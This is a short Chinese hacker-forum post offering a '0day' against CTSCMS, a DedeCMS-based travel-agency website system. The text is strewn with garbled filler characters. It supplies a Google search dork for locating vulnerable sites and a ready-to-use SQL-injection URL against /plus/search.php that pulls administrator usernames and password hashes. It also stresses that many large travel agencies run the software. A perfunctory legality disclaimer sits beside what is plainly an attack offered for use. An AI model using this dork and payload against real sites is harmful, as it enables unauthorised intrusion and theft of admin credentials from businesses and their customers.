新年多放点0day,小范围共享!
) }* W C6 I0 l6 ^2 o9 N Z$ f中国旅游服务网站管理系统CTSCMS,这个网站系统是我在近期发现的。使用dedecms二次开发的,织梦内核。由于忽视了官方的系统升级导致程序有很多的漏洞。近期爆出的注入漏洞都存在,历史的漏洞不知道是否存在。
3 i2 V" G6 ]- y3 `1 \' U8 YGoogle:2002-2011 CTSCMS.COM ,inurl:users/reg.php 旅行社, {) G+ G# \; h& A' L
POC:/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
2 U) _2 _/ q( z! U" v# X! Q
5 K2 ]2 u% ^1 I" r) p2 @后来我又发现,这套程序都是一个人在做 国内很多旅行社网站在用! Z+ C; d' ~# }# F. {& a
9 [0 I( T/ b( J8 @
2 n7 h" g2 e j7 ]$ G* h* _
7 w6 U) x9 s' T h# k - V3 m" \: t. g$ u
5 W# m n3 `$ Q& z
很多大型旅行社网站都在用,请在法律允许的范围内测试。 黑客保重....3 R2 |7 |9 [: s; }0 w: m3 h
8 q. [: a `6 q! o1 Y! h
|